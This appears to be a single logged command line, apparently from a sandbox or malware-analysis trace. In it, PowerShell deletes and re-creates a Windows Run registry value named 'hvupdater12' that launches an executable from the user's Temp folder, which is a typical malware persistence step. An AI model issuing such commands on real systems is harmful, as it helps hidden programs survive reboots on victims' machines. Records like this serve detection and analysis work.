powershell.exe "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'hvupdater12';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'hvupdater12' -Value '"C:\Users\test22\AppData\Local\Temp\hvupdater12.exe"' -PropertyType 'String'
2212